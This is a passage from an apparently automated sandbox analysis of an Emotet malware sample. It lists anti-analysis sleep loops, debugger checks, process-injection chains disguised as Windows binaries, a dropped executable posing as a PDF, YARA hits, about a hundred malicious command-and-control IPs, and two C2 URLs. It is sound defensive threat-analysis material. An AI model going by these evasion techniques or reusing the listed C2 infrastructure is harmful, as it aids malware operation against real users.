Source: C:\Windows\SysWOW64\clip\mmcshext.exe	Window / User API: threadDelayed 9710	Jump to behavior
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Window / User API: threadDelayed 401	Jump to behavior
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Window / User API: threadDelayed 9599	Jump to behavior
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Window / User API: threadDelayed 9865	Jump to behavior
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Window / User API: threadDelayed 9742	Jump to behavior
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Window / User API: threadDelayed 9919	Jump to behavior
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Window / User API: threadDelayed 9476	Jump to behavior
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe	Window / User API: threadDelayed 9833	Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Windows\System32\certutil.exe

Dropped PE file which has not been started: C:\Users\Public\Ksh1.pdf

Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe TID: 2488	Thread sleep count: 250 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe TID: 2488	Thread sleep count: 9750 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\clip\mmcshext.exe TID: 1784	Thread sleep count: 290 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\clip\mmcshext.exe TID: 1784	Thread sleep count: 9710 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe TID: 2648	Thread sleep count: 401 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe TID: 2648	Thread sleep count: 9599 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe TID: 3020	Thread sleep count: 135 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe TID: 3020	Thread sleep count: 9865 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe TID: 2812	Thread sleep count: 9742 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe TID: 2812	Thread sleep count: 258 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe TID: 2836	Thread sleep count: 9919 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe TID: 2836	Thread sleep count: 81 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe TID: 2632	Thread sleep count: 9476 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe TID: 2632	Thread sleep count: 237 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe TID: 1068	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe TID: 1572	Thread sleep count: 167 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe TID: 1572	Thread sleep count: 9833 > 30	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\clip\mmcshext.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_006438F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,	8_2_006438F0
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe	Code function: 9_2_003F38F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,	9_2_003F38F0
Source: C:\Windows\SysWOW64\clip\mmcshext.exe	Code function: 10_2_003F38F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,	10_2_003F38F0
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Code function: 11_2_003338F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,	11_2_003338F0
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Code function: 12_2_004F38F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,	12_2_004F38F0
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Code function: 13_2_002938F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,	13_2_002938F0
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Code function: 14_2_01C638F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,	14_2_01C638F0
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Code function: 15_2_003F38F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,	15_2_003F38F0
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe	Code function: 16_2_004738F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,	16_2_004738F0

Source: dhcpcmonitor.exe, 0000000C.00000002.2273855343.000000000030F000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: dhcpcmonitor.exe, 0000000C.00000002.2273855343.000000000030F000.00000004.00000020.sdmp	Binary or memory string: PPTP00VMware_S

Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Contains functionality to read the PEB

Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_00644DF0 mov eax, dword ptr fs:[00000030h]	8_2_00644DF0
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_00643F00 mov eax, dword ptr fs:[00000030h]	8_2_00643F00
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe	Code function: 9_2_003F3F00 mov eax, dword ptr fs:[00000030h]	9_2_003F3F00
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe	Code function: 9_2_003F4DF0 mov eax, dword ptr fs:[00000030h]	9_2_003F4DF0
Source: C:\Windows\SysWOW64\clip\mmcshext.exe	Code function: 10_2_003F3F00 mov eax, dword ptr fs:[00000030h]	10_2_003F3F00
Source: C:\Windows\SysWOW64\clip\mmcshext.exe	Code function: 10_2_003F4DF0 mov eax, dword ptr fs:[00000030h]	10_2_003F4DF0
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Code function: 11_2_00333F00 mov eax, dword ptr fs:[00000030h]	11_2_00333F00
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Code function: 11_2_00334DF0 mov eax, dword ptr fs:[00000030h]	11_2_00334DF0
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Code function: 12_2_004F3F00 mov eax, dword ptr fs:[00000030h]	12_2_004F3F00
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Code function: 12_2_004F4DF0 mov eax, dword ptr fs:[00000030h]	12_2_004F4DF0
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Code function: 13_2_00293F00 mov eax, dword ptr fs:[00000030h]	13_2_00293F00
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Code function: 13_2_00294DF0 mov eax, dword ptr fs:[00000030h]	13_2_00294DF0
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Code function: 14_2_01C64DF0 mov eax, dword ptr fs:[00000030h]	14_2_01C64DF0
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Code function: 14_2_01C63F00 mov eax, dword ptr fs:[00000030h]	14_2_01C63F00
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Code function: 15_2_003F3F00 mov eax, dword ptr fs:[00000030h]	15_2_003F3F00
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Code function: 15_2_003F4DF0 mov eax, dword ptr fs:[00000030h]	15_2_003F4DF0
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe	Code function: 16_2_00473F00 mov eax, dword ptr fs:[00000030h]	16_2_00473F00
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe	Code function: 16_2_00474DF0 mov eax, dword ptr fs:[00000030h]	16_2_00474DF0

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe

Code function: 8_2_00649860 GetModuleFileNameW,SHGetFolderPathW,SHGetFolderPathW,OpenSCManagerW,OpenSCManagerW,CloseServiceHandle,CloseServiceHandle,GetProcessHeap,RtlAllocateHeap,SHGetFolderPathW,SHGetFolderPathW,

8_2_00649860

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Process created: C:\Windows\SysWOW64\mfcm140\normaliz.exe C:\Windows\SysWOW64\mfcm140\normaliz.exe	Jump to behavior
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe	Process created: C:\Windows\SysWOW64\clip\mmcshext.exe C:\Windows\SysWOW64\clip\mmcshext.exe	Jump to behavior
Source: C:\Windows\SysWOW64\clip\mmcshext.exe	Process created: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Jump to behavior
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Process created: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Jump to behavior
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Process created: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Jump to behavior
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Process created: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Jump to behavior
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Process created: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Process created: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe	Jump to behavior

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe

Code function: 8_2_006480A0 SetFileInformationByHandle,GetSystemTimeAsFileTime,_snwprintf,GetProcessHeap,HeapFree,CreateFileW,CreateFileW,CloseHandle,

8_2_006480A0

Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe

Code function: 16_2_004753D0 RtlGetVersion,GetNativeSystemInfo,GetNativeSystemInfo,

16_2_004753D0

Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Emotet

Source: Yara match	File source: 0000000A.00000003.2260910791.0000000000688000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.2274679265.00000000005B8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2269436388.0000000000331000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2289663022.00000000005B6000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2274011391.00000000004F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2260946472.00000000003F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2330396700.00000000002B4000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2278477954.0000000000574000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2330617776.0000000000471000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2265106835.00000000003F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2289619290.00000000002F8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2269524139.0000000000504000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.2265408389.0000000000548000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2273841914.00000000002F6000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2265371977.0000000000686000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.2279155029.00000000002B8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2255546226.0000000000641000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.2284287661.00000000005B8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2282904583.0000000000274000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2286207050.0000000001C61000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.2256075266.0000000000658000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2255733615.0000000000926000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2278304115.0000000000291000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2269934201.00000000002F8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2261089149.0000000000614000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2289418364.00000000003F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.2251551044.0000000000928000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 13.3.adsmsext.exe.5b8ab8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.mmcshext.exe.688500.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.adsmsext.exe.5b8ab8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.msvcp120_clr0400.exe.2f8598.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.tmp_e473b4.exe.9285b8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.tmp_e473b4.exe.9285b8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.TSChannel.exe.2b8550.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.adsmsext.exe.290000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.3.normaliz.exe.658540.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.msvcp120_clr0400.exe.2f8598.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.mmcshext.exe.688500.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.ir50_qcx.exe.330000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.ir50_qcx.exe.548548.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.adsmsext.exe.5b8ab8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.dhcpcmonitor.exe.2f8560.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.TSChannel.exe.2b8550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.tmp_e473b4.exe.9285b8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.ir50_qcx.exe.548548.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.TSChannel.exe.2b8550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.3.normaliz.exe.658540.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.msvcp120_clr0400.exe.2f8598.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.ir50_qcx.exe.548548.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.qdvd.exe.5b8518.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.tmp_e473b4.exe.640000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.normaliz.exe.3f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.TSChannel.exe.2b8550.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.adsmsext.exe.5b8ab8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.tmp_e473b4.exe.9285b8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.dhcpcmonitor.exe.2f8560.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.qdvd.exe.3f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.qdvd.exe.5b8518.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.qdvd.exe.5b8518.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.TSChannel.exe.1c60000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.dhcpcmonitor.exe.2f8560.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.mmcshext.exe.688500.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.qdvd.exe.5b8518.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.ir50_qcx.exe.548548.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.dhcpcmonitor.exe.2f8560.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.mmcshext.exe.688500.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.mmcshext.exe.3f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.normaliz.exe.658540.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.dhcpcmonitor.exe.4f0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.msvcp120_clr0400.exe.470000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.normaliz.exe.658540.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.msvcp120_clr0400.exe.2f8598.0.unpack, type: UNPACKEDPE

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
126.126.139.26	unknown	Japan	17676	GIGAINFRASoftbankBBCorpJP	true
203.153.216.178	unknown	Indonesia	45291	SURF-IDPTSurfindoNetworkID	true
104.131.144.215	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
143.95.101.72	unknown	United States	62729	ASMALLORANGE1US	true
162.144.145.58	unknown	United States	46606	UNIFIEDLAYER-AS-1US	true
180.23.53.200	unknown	Japan	4713	OCNNTTCommunicationsCorporationJP	true
190.164.135.81	unknown	Chile	22047	VTRBANDAANCHASACL	true
45.239.204.100	unknown	Brazil	268405	BMOBUENOCOMUNICACOES-MEBR	true
37.187.100.220	unknown	France	16276	OVHFR	true
190.85.46.52	unknown	Colombia	14080	TelmexColombiaSACO	true
88.247.58.26	unknown	Turkey	9121	TTNETTR	true
190.194.12.132	unknown	Argentina	10481	TelecomArgentinaSAAR	true
103.80.51.61	unknown	Thailand	136023	PTE-AS-APPTEGroupCoLtdTH	true
82.78.179.117	unknown	Romania	8708	RCS-RDS73-75DrStaicoviciRO	true
188.226.165.170	unknown	European Union	14061	DIGITALOCEAN-ASNUS	true
213.165.178.214	unknown	Malta	12709	MELITACABLEMT	true
119.92.77.17	unknown	Philippines	9299	IPG-AS-APPhilippineLongDistanceTelephoneCompanyPH	true
46.105.131.68	unknown	France	16276	OVHFR	true
47.154.85.229	unknown	United States	5650	FRONTIER-FRTRUS	true
192.163.221.191	unknown	United States	46606	UNIFIEDLAYER-AS-1US	true
190.117.101.56	unknown	Peru	12252	AmericaMovilPeruSACPE	true
190.192.39.136	unknown	Argentina	10481	TelecomArgentinaSAAR	true
157.7.164.178	unknown	Japan	7506	INTERQGMOInternetIncJP	true
115.79.59.157	unknown	Viet Nam	7552	VIETEL-AS-APViettelGroupVN	true
192.241.220.183	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
113.203.238.130	unknown	Pakistan	9387	AUGERE-PKAUGERE-PakistanPK	true
78.186.65.230	unknown	Turkey	9121	TTNETTR	true
46.32.229.152	unknown	United Kingdom	20738	GD-EMEA-DC-LD5GB	true
172.193.79.237	unknown	Australia	18747	IFX18747US	true
51.38.50.144	unknown	France	16276	OVHFR	true
190.55.186.229	unknown	Argentina	27747	TelecentroSAAR	true
60.125.114.64	unknown	Japan	17676	GIGAINFRASoftbankBBCorpJP	true
94.212.52.40	unknown	Netherlands	33915	TNF-ASNL	true
58.27.215.3	unknown	Pakistan	38264	WATEEN-IMS-PK-AS-APNationalWiMAXIMSenvironmentPK	true
41.185.29.128	unknown	South Africa	36943	GridhostZA	true
91.75.75.46	unknown	United Arab Emirates	15802	DU-AS1AE	true
95.76.142.243	unknown	Romania	6830	LIBERTYGLOBALLibertyGlobalformerlyUPCBroadbandHolding	true
27.83.209.210	unknown	Japan	2516	KDDIKDDICORPORATIONJP	true
2.58.16.86	unknown	Latvia	64421	SERTEX-ASLV	true
221.147.142.214	unknown	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	true
188.166.220.180	unknown	Netherlands	14061	DIGITALOCEAN-ASNUS	true
115.79.195.246	unknown	Viet Nam	7552	VIETEL-AS-APViettelGroupVN	true
118.33.121.37	unknown	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	true
188.40.170.197	unknown	Germany	24940	HETZNER-ASDE	true
179.5.118.12	unknown	El Salvador	14754	TelguaGT	true
36.91.44.183	unknown	Indonesia	17974	TELKOMNET-AS2-APPTTelekomunikasiIndonesiaID	true
192.210.217.94	unknown	United States	36352	AS-COLOCROSSINGUS	true
85.75.49.113	unknown	Greece	6799	OTENET-GRAthens-GreeceGR	true
223.17.215.76	unknown	Hong Kong	18116	HGC-AS-APHGCGlobalCommunicationsLimitedHK	true
185.208.226.142	unknown	Hungary	43359	TARHELYHU	true
41.76.213.144	unknown	South Africa	37611	AfrihostZA	true
75.127.14.170	unknown	United States	36352	AS-COLOCROSSINGUS	true
172.96.190.154	unknown	Canada	59253	LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG	true
91.121.87.90	unknown	France	16276	OVHFR	true
109.206.139.119	unknown	Russian Federation	47914	CDMSRU	true
103.229.73.17	unknown	Indonesia	55660	MWN-AS-IDPTMasterWebNetworkID	true
178.33.167.120	unknown	France	16276	OVHFR	true
43.255.175.197	unknown	Malaysia	9534	MAXIS-AS1-APBinariangBerhadMY	true
5.79.70.250	unknown	Netherlands	60781	LEASEWEB-NL-AMS-01NetherlandsNL	true
120.51.34.254	unknown	Japan	2519	VECTANTARTERIANetworksCorporationJP	true
125.200.20.233	unknown	Japan	4713	OCNNTTCommunicationsCorporationJP	true
103.93.220.182	unknown	Philippines	17639	CONVERGE-ASConvergeICTSolutionsIncPH	true
37.205.9.252	unknown	Czech Republic	24971	MASTER-ASCzechRepublicwwwmasterczCZ	true
118.243.83.70	unknown	Japan	4685	ASAHI-NETAsahiNetJP	true
172.105.78.244	unknown	United States	63949	LINODE-APLinodeLLCUS	true
123.216.134.52	unknown	Japan	4713	OCNNTTCommunicationsCorporationJP	true
91.213.106.100	unknown	Latvia	49667	IKFRIGA-ASLV	true
37.46.129.215	unknown	Russian Federation	29182	THEFIRST-ASRU	true
121.117.147.153	unknown	Japan	4713	OCNNTTCommunicationsCorporationJP	true
110.37.224.243	unknown	Pakistan	38264	WATEEN-IMS-PK-AS-APNationalWiMAXIMSenvironmentPK	true
180.148.4.130	unknown	Viet Nam	45557	VNTT-AS-VNVietnamTechnologyandTelecommunicationJSCVN	true
113.161.148.81	unknown	Viet Nam	45899	VNPT-AS-VNVNPTCorpVN	true
116.202.10.123	unknown	Germany	24940	HETZNER-ASDE	true
177.130.51.198	unknown	Brazil	52747	WspServicosdeTelecomunicacoesLtdaBR	true
153.229.219.1	unknown	Japan	4713	OCNNTTCommunicationsCorporationJP	true
203.56.191.129	unknown	Australia	38220	AMAZE-SYD-AS-APwwwamazecomauAU	true
180.21.3.52	unknown	Japan	4713	OCNNTTCommunicationsCorporationJP	true
54.38.143.245	unknown	France	16276	OVHFR	true
77.74.78.80	unknown	Russian Federation	31261	GARS-ASMoscowRussiaRU	true
8.4.9.137	unknown	United States	3356	LEVEL3US	true
79.133.6.236	unknown	Finland	3238	ALCOMFI	true
202.29.237.113	unknown	Thailand	4621	UNINET-AS-APUNINET-TH	true
185.80.172.199	unknown	Azerbaijan	39232	UNINETAZ	true
74.208.173.91	unknown	United States	8560	ONEANDONE-ASBrauerstrasse48DE	true
116.91.240.96	unknown	Japan	2519	VECTANTARTERIANetworksCorporationJP	true
139.59.61.215	unknown	Singapore	14061	DIGITALOCEAN-ASNUS	true
212.198.71.39	unknown	France	21502	ASN-NUMERICABLEFR	true
175.103.38.146	unknown	Indonesia	38320	MMS-AS-IDPTMaxindoMitraSolusiID	true
50.116.78.109	unknown	United States	46606	UNIFIEDLAYER-AS-1US	true
109.13.179.195	unknown	France	15557	LDCOMNETFR	true
42.200.96.63	unknown	Hong Kong	4760	HKTIMS-APHKTLimitedHK	true
73.100.19.104	unknown	United States	7922	COMCAST-7922US	true
24.231.51.190	unknown	Bahamas	15146	CABLEBAHAMASBS	true
190.151.5.131	unknown	Chile	6471	ENTELCHILESACL	true
113.193.239.51	unknown	India	45528	TIKONAIN-ASTikonaInfinetLtdIN	true
185.142.236.163	unknown	Netherlands	174	COGENT-174US	true
198.20.228.9	unknown	United States	46606	UNIFIEDLAYER-AS-1US	true
139.59.12.63	unknown	Singapore	14061	DIGITALOCEAN-ASNUS	true
73.55.128.120	unknown	United States	7922	COMCAST-7922US	true
91.83.93.103	unknown	Hungary	12301	INVITECHHU	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://91.121.87.90:8080/KFDwQljVkxD3/OOFcmzcP5LKdqC/7kx60YXntHFlDt/5Rmtlx5Mir4E2nTGMFj/vs6RDbQfHrygTYrI/	true	Avira URL Cloud: safe	unknown
http://177.130.51.198/43z7rPqPirmV4qB/AthcoPDmU/Q4ILc7kQKSHycUR/pIpU/8iSRPWx/wgrz9ygVvehFY9FxG0/	true	Avira URL Cloud: safe	unknown

AV Detection:

Antivirus / Scanner detection for submitted sample

Source: sample1.doc

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\Public\Ksh1.pdf

Avira: detection malicious, Label: TR/Casdet.xqfgu

Found malware configuration

Source: 10.2.mmcshext.exe.688500.3.raw.unpack

Multi AV Scanner detection for dropped file

Source: C:\Users\Public\Ksh1.pdf	Metadefender: Detection: 40%			Perma Link
Source: C:\Users\Public\Ksh1.pdf	ReversingLabs: Detection: 66%

Multi AV Scanner detection for submitted file

Source: sample1.doc	Virustotal: Detection: 57%	Perma Link
